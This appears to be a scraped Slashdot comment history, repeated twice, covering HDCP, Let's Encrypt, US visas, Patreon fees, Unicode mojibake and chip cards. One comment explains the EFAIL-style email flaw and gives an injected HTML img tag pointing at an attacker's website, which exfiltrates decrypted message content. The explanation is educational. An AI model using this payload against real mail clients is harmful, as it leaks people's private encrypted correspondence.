That glowy thing on the other end of that HDCP connection is called "A monitor" and it doesn't show encrypted pictures nor does it do the encryption itself. Therefore it has to be getting it as raw free text.
Sounds like you don't know what HDCP is. Yes, the glowy thing does do the decryption itself if it can receive HDCP content; that's the whole point.
Does your browser say that https://yro.slashdot.org/ is secure? Because Slashdot uses Let's Encrypt. If your browser doesn't show it as trusted, you're probably using root certificates that are 10 years old, and you should update them.
Cable is fiber to a few miles away from your house, where it gets converted to coax and you're sharing that fiber with maybe 1000 people. FTTH is fiber until a box on the side of your house or in your garage, where it gets converted to Ethernet (or coax, but that's not as common), and you're sharing that fiber with maybe 30 other people. They're very different.
The translation in TFA didn't even get her name right (it is Meng Wenzhou).
No, it's Meng Wanzhou. The translation in TFA isn't perfect, but it's fine; definitely a lot better than Google Translate ("Hello, I am Meng night boat.")
So "Gemini Advisory" says card fraud is up, huh? But Visa says that fraud is down. Who's right? I don't know, and don't feel like looking into the details of both reports. It's likely that both are right, and they're talking about different types of fraud. My understanding is that overall, fraud is down significantly, but some types of fraud are up, such as card skimming at gas pumps (since the chip conversion deadline for those is still in the future and very few of them support chips right now.)
Sorta related, but not the same. De Bruijn sequences contain all possible strings of length n using an alphabet of size k, whereas this is about the shortest string that contains all possible permutations of the string 123...n
E.g., if n = 2 and the alphabet contains "1" and "2" (k = 2), a De Bruijn sequence would be 1122, which contains 11, 12, 22, and 21 (it wraps around. 11221 if you want to make it explicit.).
But for this problem, if n = 2, the shortest sequence is 121, which contains 12 and 21. It doesn't need to contain 11 or 22, because those aren't permutations of 12.
"HTTPS doesn't require much at all." - It requires maintenance effort and incurs a financial cost. You have to buy certificates and they expire. Yes, there are free certificates like those from Let's Encrypt, but they are cumbersome to use and expire after 3 months.
I switched my certs from a commercial CA to Let's Encrypt, and maintenance effort has gone down. With my previous CA, every two years, I'd have to go to the CA's website, put in credit card information, upload CSRs, download certificates, etc. With Let's Encrypt, I install a cron job on my webserver that automatically renews the cert without me having to do a thing. Sure, they expire after 3 months, but since I don't have to spend time renewing them, what do I care?
I don't play fast games, but I think the sensor is great for "office" type work. I had a Logitech MX400 with its laser tracker that would skip on a mousepad, of all things. The BlueTrack sensor in the MS mice tracks smoothly on just about everything I've tried (mousepad, plastic table, glossy wood table). It even works fairly well on a wood table with a sheet of glass over it.
The FA mentions at the end that the mouse is available direct from Microsoft, and the MS page gives the part number as HDQ-00001. But that part number is also available from Amazon, which says, "Date First Available: October 16, 2017".
In fact, I have one of them; Amazon tells me that I "purchased this item on March 11, 2018". I like the mouse a lot: it's corded, the BlueTrack sensor works well, and I like the shape. It's a good mouse, but it's not all that new.
P.S. I also like the Microsoft Sculpt Comfort Bluetooth Mouse for a Bluetooth mouse. It's not a miniature "laptop" mouse, but I use it with my laptop... I had a small laptop mouse for a while, but prefer the feel of the larger mouse. Gotta say, MS still makes good mice (and keyboards).
Except the email is still encrypted at this point. How could they inject HTML into an encrypted email?
If you don't know the answer to that, maybe you should actually read the description of the flaw?
There are actually two flaws: one is a buggy mail reader application; it should be straightforward to fix the bug. The other is a problem with the spec for encrypting emails (i.e., S/MIME, or whatever the spec for PGP-encrypted email is called).
The mail reader bug is easier to explain: the encrypted email is not 100% encrypted. The contents are encrypted. But MIME messages contain some unencrypted metadata, such as the headers and boundary markers. So the way you inject HTML into an encrypted email is to add a new MIME text/html part before the encrypted part that contains: <img src="http://attackers.website/, and add a new MIME text/html part after the encrypted part that contains: ">. When the buggy mail reader processes the various MIME parts, it decrypts the encrypted part, resulting in HTML plaintext. Now here's the bug: it then joins all the HTML parts into a single HTML document for display, and that results in <img src="http://attackers.website/decrypted content">. So the mail reader app sends an HTTP request to the attacker's website containing the decrypted message in the URL.
The other flaw has to do with a known plaintext attack; if you want to know how that works, RTFA.
Lawful Permanent Residents (green card holders) have never been banned from entering the U.S., regardless of their country of birth..
Bzzzt! I'm sorry, but that's incorrect. Perhaps it's your post that's the lie? LPRs were banned as part of Trump's first travel ban. The second one (February 1, 2018) added the exemption for LPRs. See this, or basically any article that covered the travel ban. "White House Counsel Don McGahn issued 'authoritative guidance' on Wednesday clarifying that key parts of Trump's controversial executive order, which is aimed at citizens of seven majority-Muslim countries, will no longer cover green card holders..." and "'They no longer need a waiver because if they are a legal permanent resident they won't need it anymore,' Spicer told reporters during a daily briefing."
What I want to know is why Telegram thinks they should get a 4+ age rating. I think 12+ would be be more appropriate--or even 17+, which I note is what it has on Google Play. Apple wouldn't get on Telegram's case about noods if they didn't claim they were appropriate for kids.
Do they not have title records for cars in the UK? It seems like it'd be a trivial exercise to look up the license plate or the VIN to determine the owner of those cars.
Out of this $1.38, $0.95 goes to the creator, $0.05 is the Patreon fee, and the remaining $0.38 is the "transaction fee" which Patreon largely pockets since they STILL batch all donations by a person into one lump sum withdrawal.
They currently batch all donations into one monthly credit card charge, but this whole discussion is about how they're changing things, not what they currently do. And they will be changing to charge each pledge separately. E.g., if you donate $1 each to 10 creators, your card currently gets charged $10 one time. But after Patreon's change, your card will be charged $1 ten times.
> IANAIL and all that, but my understanding is that since he's being paid by a US company, coming to the US for a meeting with that company is considered work, and he's no eligible for VWP or a B-1 visa.
It's called business. And it's covered by B-1 visa.
Nope, B-1 visa doesn't cover everything "called business". See the PDF I linked to earlier; it specifically says that if you're coming for a meeting, you're eligible for a B-1 only if you "will receive no salary or income from a U.S based company/entity." Like I said, people who work for a non-US company can enter the US with a B-1 (or under the VWP) to attend a business meeting, but the guy works for the Mozilla Corporation, which is a US (California) company.
My guess is that this is either employment related (i.e., they are concerned that he is carrying out paid work in the US on a visitor visa), or that it is some legal issue on the Swedish side.
Yeah, I suspect it's employment-related. If he were an employee of a foreign company, he could enter via the VWP or on a B-1 to come to a business meeting. But he's an employee of a US company, so I'm pretty sure he needs an actual work visa to come for a business meeting with that company. As the author of cURL, he might be able to get an O-1A (for individuals with an extraordinary ability in the sciences, education, business, or athletics (not including the arts, motion pictures or television industry)). Average Joes could probably get an L-1.
Even if Sweden was one of them, Stenberg has a clear relationship with a US Company. So the real question is, does Stenberg have a valid work visa? Most of the people I hear being denied entry into the US are denied because they had a paying US gig and got the wrong kind of visa
I think the summary and article make it clear that he doesn't have a work visa; he was trying to enter through the visa waiver program. And I agree that the lack of work visa is probably the issue--you can enter through the VWP or on a B-1 business visitor visa to attend a business meeting if you're employed by a foreign company and are not being paid by a US company. But Stenberg's a (presumably paid) employee of Mozilla. IANAIL and all that, but my understanding is that since he's being paid by a US company, coming to the US for a meeting with that company is considered work, and he's no eligible for VWP or a B-1 visa.
The reason it appears to not work is because of unicode abuse by commenters.
Yeah, I remember when Unicode worked, and the abuse that came along with it. If/. wants to filter out non-ASCII characters (or non Latin-1 characters), that's fine, but whatever it's currently doing is broken. There's no case where turning a curly quote into â(TM) is the correct thing to do.
It even seems like the code is trying to do something sensible, but just has a simple bug where it's using the wrong character encoding on its input. The Unicode character "RIGHT SINGLE QUOTATION MARK" is encoded as the bytes E2 80 99 in UTF-8. If you interpret those bytes as if they were Windows codepage 1252 characters, you get â, the Euro sign, then the Trademark symbol. Of those, only â is in Latin-1. It looks like Slashdot is trying to convert non-Latin-1 characters to a Latin-1 equivalent, or remove the character if there's no equivalent. So â makes it through, Euro sign is dropped, and the TM symbol gets turned into "(TM)", and you end up with the curly quote turning into "â(TM)". This is basically what GNU iconv does if you use the "//TRANSLIT" suffix on the the destination encoding, except converting to iso-8859-1//TRANSLIT turns the Euro sign into "EUR".
The code just needs to interpret the input as being UTF-8 instead of CP1252, and it should work a lot better. But it's been broken for years, and nobody there wants to fix it.
what you don't need to do is apply for a tourist visa in some countries. What they put in your passport when you're entering is a visa, and it's automatically issued to people from certain countries.
Visa exempt/visa waiver program is distinct from visa on arrival. E.g., Thailand offers visa-free entry for citizens of certain countries, visa on arrival for citizens of other countries, and requires applying for a visa in advance for citizens of yet another set of countries. Travelers who are visa-exempt get a stamp in their passport, but that stamp is not a visa, and may have restrictions compared to an actual visa. E.g., visa-exempt entry to the US cannot be extended, while entry on a tourist visa (and some other non-immigrant visas) can.
First off, they are not cheaper once you account for the money they recieve from our tax dollars.
What, that $0 they receive from our tax dollars? USPS isn't taxpayer-funded. That said, they do get some tax exemptions, so they do have some advantages in that sense. But on the other hand, many private companies get tax breaks too.
People complained about the bulk and weight of having a removable cover and another layer of hard plastic around the battery.
And besides, what are you talking about? Extra plastic? A non-removable battery is still covered by the phone case. There's no extra layer of hard plastic, just the small tabs or whatever mechanism keeps the cover attached.
I suspect Entrope is talking about the "hard plastic around the battery". A non-removable battery is covered by a thin, easily-punctured sheet of plastic, and that is then covered by the phone case. A removable battery is covered by a more substantial layer of plastic so it's more difficult to puncture or bend the actual battery inside--because that could be bad. And that is then covered by the phone case.
With no PIN, there is really no major advantage. Steal a card, forge a signature.
The advantage is that you now have to steal a card, rather than just skimming the magstripe of one. The idea is that the chip ensures that you have the actual card, and the PIN (mostly) ensures that you are an authorized user of the card. In the US, with chip and signature, we don't have that second assurance, but having the first is better than nothing.
Slashdot Mirror
That glowy thing on the other end of that HDCP connection is called "A monitor" and it doesn't show encrypted pictures nor does it do the encryption itself. Therefore it has to be getting it as raw free text.
Sounds like you don't know what HDCP is. Yes, the glowy thing does do the decryption itself if it can receive HDCP content; that's the whole point.
Does your browser say that https://yro.slashdot.org/ is secure? Because Slashdot uses Let's Encrypt. If your browser doesn't show it as trusted, you're probably using root certificates that are 10 years old, and you should update them.
Cable is fiber to a few miles away from your house, where it gets converted to coax and you're sharing that fiber with maybe 1000 people. FTTH is fiber until a box on the side of your house or in your garage, where it gets converted to Ethernet (or coax, but that's not as common), and you're sharing that fiber with maybe 30 other people. They're very different.
No, it's Meng Wanzhou. The translation in TFA isn't perfect, but it's fine; definitely a lot better than Google Translate ("Hello, I am Meng night boat.")
So "Gemini Advisory" says card fraud is up, huh? But Visa says that fraud is down. Who's right? I don't know, and don't feel like looking into the details of both reports. It's likely that both are right, and they're talking about different types of fraud. My understanding is that overall, fraud is down significantly, but some types of fraud are up, such as card skimming at gas pumps (since the chip conversion deadline for those is still in the future and very few of them support chips right now.)
Sorta related, but not the same. De Bruijn sequences contain all possible strings of length n using an alphabet of size k, whereas this is about the shortest string that contains all possible permutations of the string 123...n
E.g., if n = 2 and the alphabet contains "1" and "2" (k = 2), a De Bruijn sequence would be 1122, which contains 11, 12, 22, and 21 (it wraps around. 11221 if you want to make it explicit.).
But for this problem, if n = 2, the shortest sequence is 121, which contains 12 and 21. It doesn't need to contain 11 or 22, because those aren't permutations of 12.
What's false about it? nten didn't say that VBA is compiled to .Net; he said, "It [VBA] is compiled to native."
Nope.
I came to look for a post mentioning the DEC logo, and it turns out to be the frist one. Congrats and good job!
"HTTPS doesn't require much at all." - It requires maintenance effort and incurs a financial cost. You have to buy certificates and they expire. Yes, there are free certificates like those from Let's Encrypt, but they are cumbersome to use and expire after 3 months.
I switched my certs from a commercial CA to Let's Encrypt, and maintenance effort has gone down. With my previous CA, every two years, I'd have to go to the CA's website, put in credit card information, upload CSRs, download certificates, etc. With Let's Encrypt, I install a cron job on my webserver that automatically renews the cert without me having to do a thing. Sure, they expire after 3 months, but since I don't have to spend time renewing them, what do I care?
I don't play fast games, but I think the sensor is great for "office" type work. I had a Logitech MX400 with its laser tracker that would skip on a mousepad, of all things. The BlueTrack sensor in the MS mice tracks smoothly on just about everything I've tried (mousepad, plastic table, glossy wood table). It even works fairly well on a wood table with a sheet of glass over it.
The FA mentions at the end that the mouse is available direct from Microsoft, and the MS page gives the part number as HDQ-00001. But that part number is also available from Amazon, which says, "Date First Available: October 16, 2017".
In fact, I have one of them; Amazon tells me that I "purchased this item on March 11, 2018". I like the mouse a lot: it's corded, the BlueTrack sensor works well, and I like the shape. It's a good mouse, but it's not all that new.
P.S. I also like the Microsoft Sculpt Comfort Bluetooth Mouse for a Bluetooth mouse. It's not a miniature "laptop" mouse, but I use it with my laptop... I had a small laptop mouse for a while, but prefer the feel of the larger mouse. Gotta say, MS still makes good mice (and keyboards).
Except the email is still encrypted at this point. How could they inject HTML into an encrypted email?
If you don't know the answer to that, maybe you should actually read the description of the flaw?
There are actually two flaws: one is a buggy mail reader application; it should be straightforward to fix the bug. The other is a problem with the spec for encrypting emails (i.e., S/MIME, or whatever the spec for PGP-encrypted email is called).
The mail reader bug is easier to explain: the encrypted email is not 100% encrypted. The contents are encrypted. But MIME messages contain some unencrypted metadata, such as the headers and boundary markers. So the way you inject HTML into an encrypted email is to add a new MIME text/html part before the encrypted part that contains: <img src="http://attackers.website/, and add a new MIME text/html part after the encrypted part that contains: ">. When the buggy mail reader processes the various MIME parts, it decrypts the encrypted part, resulting in HTML plaintext. Now here's the bug: it then joins all the HTML parts into a single HTML document for display, and that results in <img src="http://attackers.website/decrypted content">. So the mail reader app sends an HTTP request to the attacker's website containing the decrypted message in the URL.
The other flaw has to do with a known plaintext attack; if you want to know how that works, RTFA.
The second one (February 1, 2018)
Typo: 2017*
The article is full of lies. Here is an example:
Lawful Permanent Residents (green card holders) have never been banned from entering the U.S., regardless of their country of birth..
Bzzzt! I'm sorry, but that's incorrect. Perhaps it's your post that's the lie? LPRs were banned as part of Trump's first travel ban. The second one (February 1, 2018) added the exemption for LPRs. See this, or basically any article that covered the travel ban. "White House Counsel Don McGahn issued 'authoritative guidance' on Wednesday clarifying that key parts of Trump's controversial executive order, which is aimed at citizens of seven majority-Muslim countries, will no longer cover green card holders ..." and "'They no longer need a waiver because if they are a legal permanent resident they won't need it anymore,' Spicer told reporters during a daily briefing."
What I want to know is why Telegram thinks they should get a 4+ age rating. I think 12+ would be be more appropriate--or even 17+, which I note is what it has on Google Play. Apple wouldn't get on Telegram's case about noods if they didn't claim they were appropriate for kids.
Do they not have title records for cars in the UK? It seems like it'd be a trivial exercise to look up the license plate or the VIN to determine the owner of those cars.
Out of this $1.38, $0.95 goes to the creator, $0.05 is the Patreon fee, and the remaining $0.38 is the "transaction fee" which Patreon largely pockets since they STILL batch all donations by a person into one lump sum withdrawal.
They currently batch all donations into one monthly credit card charge, but this whole discussion is about how they're changing things, not what they currently do. And they will be changing to charge each pledge separately. E.g., if you donate $1 each to 10 creators, your card currently gets charged $10 one time. But after Patreon's change, your card will be charged $1 ten times.
> IANAIL and all that, but my understanding is that since he's being paid by a US company, coming to the US for a meeting with that company is considered work, and he's no eligible for VWP or a B-1 visa.
It's called business. And it's covered by B-1 visa.
Nope, B-1 visa doesn't cover everything "called business". See the PDF I linked to earlier; it specifically says that if you're coming for a meeting, you're eligible for a B-1 only if you "will receive no salary or income from a U.S based company/entity." Like I said, people who work for a non-US company can enter the US with a B-1 (or under the VWP) to attend a business meeting, but the guy works for the Mozilla Corporation, which is a US (California) company.
My guess is that this is either employment related (i.e., they are concerned that he is carrying out paid work in the US on a visitor visa), or that it is some legal issue on the Swedish side.
Yeah, I suspect it's employment-related. If he were an employee of a foreign company, he could enter via the VWP or on a B-1 to come to a business meeting. But he's an employee of a US company, so I'm pretty sure he needs an actual work visa to come for a business meeting with that company. As the author of cURL, he might be able to get an O-1A (for individuals with an extraordinary ability in the sciences, education, business, or athletics (not including the arts, motion pictures or television industry)). Average Joes could probably get an L-1.
Even if Sweden was one of them, Stenberg has a clear relationship with a US Company. So the real question is, does Stenberg have a valid work visa? Most of the people I hear being denied entry into the US are denied because they had a paying US gig and got the wrong kind of visa
I think the summary and article make it clear that he doesn't have a work visa; he was trying to enter through the visa waiver program. And I agree that the lack of work visa is probably the issue--you can enter through the VWP or on a B-1 business visitor visa to attend a business meeting if you're employed by a foreign company and are not being paid by a US company. But Stenberg's a (presumably paid) employee of Mozilla. IANAIL and all that, but my understanding is that since he's being paid by a US company, coming to the US for a meeting with that company is considered work, and he's no eligible for VWP or a B-1 visa.
The reason it appears to not work is because of unicode abuse by commenters.
Yeah, I remember when Unicode worked, and the abuse that came along with it. If /. wants to filter out non-ASCII characters (or non Latin-1 characters), that's fine, but whatever it's currently doing is broken. There's no case where turning a curly quote into â(TM) is the correct thing to do.
It even seems like the code is trying to do something sensible, but just has a simple bug where it's using the wrong character encoding on its input. The Unicode character "RIGHT SINGLE QUOTATION MARK" is encoded as the bytes E2 80 99 in UTF-8. If you interpret those bytes as if they were Windows codepage 1252 characters, you get â, the Euro sign, then the Trademark symbol. Of those, only â is in Latin-1. It looks like Slashdot is trying to convert non-Latin-1 characters to a Latin-1 equivalent, or remove the character if there's no equivalent. So â makes it through, Euro sign is dropped, and the TM symbol gets turned into "(TM)", and you end up with the curly quote turning into "â(TM)". This is basically what GNU iconv does if you use the "//TRANSLIT" suffix on the the destination encoding, except converting to iso-8859-1//TRANSLIT turns the Euro sign into "EUR".
The code just needs to interpret the input as being UTF-8 instead of CP1252, and it should work a lot better. But it's been broken for years, and nobody there wants to fix it.
Actually, you're rather wrong
NO U
what you don't need to do is apply for a tourist visa in some countries. What they put in your passport when you're entering is a visa, and it's automatically issued to people from certain countries.
Visa exempt/visa waiver program is distinct from visa on arrival. E.g., Thailand offers visa-free entry for citizens of certain countries, visa on arrival for citizens of other countries, and requires applying for a visa in advance for citizens of yet another set of countries. Travelers who are visa-exempt get a stamp in their passport, but that stamp is not a visa, and may have restrictions compared to an actual visa. E.g., visa-exempt entry to the US cannot be extended, while entry on a tourist visa (and some other non-immigrant visas) can.
First off, they are not cheaper once you account for the money they recieve from our tax dollars.
What, that $0 they receive from our tax dollars? USPS isn't taxpayer-funded. That said, they do get some tax exemptions, so they do have some advantages in that sense. But on the other hand, many private companies get tax breaks too.
People complained about the bulk and weight of having a removable cover and another layer of hard plastic around the battery.
And besides, what are you talking about? Extra plastic? A non-removable battery is still covered by the phone case. There's no extra layer of hard plastic, just the small tabs or whatever mechanism keeps the cover attached.
I suspect Entrope is talking about the "hard plastic around the battery". A non-removable battery is covered by a thin, easily-punctured sheet of plastic, and that is then covered by the phone case. A removable battery is covered by a more substantial layer of plastic so it's more difficult to puncture or bend the actual battery inside--because that could be bad. And that is then covered by the phone case.
With no PIN, there is really no major advantage. Steal a card, forge a signature.
The advantage is that you now have to steal a card, rather than just skimming the magstripe of one. The idea is that the chip ensures that you have the actual card, and the PIN (mostly) ensures that you are an authorized user of the card. In the US, with chip and signature, we don't have that second assurance, but having the first is better than nothing.